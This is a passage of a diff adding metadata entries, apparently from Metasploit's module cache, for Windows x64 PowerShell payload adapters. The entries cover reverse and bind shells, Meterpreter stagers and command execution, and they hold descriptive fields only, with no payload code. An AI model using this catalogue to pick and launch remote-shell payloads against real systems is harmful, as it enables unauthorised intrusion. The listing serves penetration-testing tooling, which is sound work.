"/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/custom/bind_named_pipe": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/x64/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "UserExistsError" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/powershell/x64/custom/bind_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/powershell/x64/custom/bind_tcp_rc4": { + "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/custom/bind_tcp_uuid": { + "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_http": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_http", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_https": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "agix", + "rwincey" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_https", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_named_pipe": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_tcp_rc4": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_tcp_uuid": { + "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_winhttp": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/powershell/x64/custom/reverse_winhttps": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/powershell/x64/encrypted_shell/reverse_tcp": { + "name": "Powershell Exec, Windows Command Shell, Encrypted Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/encrypted_shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/encrypted_shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/encrypted_shell", + "stager_refname": "windows/x64/encrypted_reverse_tcp" + }, + "payload_cmd/windows/powershell/x64/exec": { + "name": "Powershell Exec, Windows x64 Execute Command", + "fullname": "payload/cmd/windows/powershell/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nExecute an arbitrary command (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/exec", + "staged": false + }, + "payload_cmd/windows/powershell/x64/loadlibrary": { + "name": "Powershell Exec, Windows x64 LoadLibrary Path", + "fullname": "payload/cmd/windows/powershell/x64/loadlibrary", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "scriptjunkie", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nLoad an arbitrary x64 library path", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/loadlibrary", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/loadlibrary", + "staged": false + }, + "payload_cmd/windows/powershell/x64/messagebox": { + "name": "Powershell Exec, Windows MessageBox x64", + "fullname": "payload/cmd/windows/powershell/x64/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "pasta " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/messagebox", + "staged": false + }, + "payload_cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/meterpreter/bind_named_pipe": { + "name": "Powershell Exec, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/powershell/x64/meterpreter/bind_tcp": { + "name": "Powershell Exec, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_http": { + "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_http", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/powershell/x64/meterpreter/reverse_https": { + "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/x64/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "agix", + "rwincey" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": 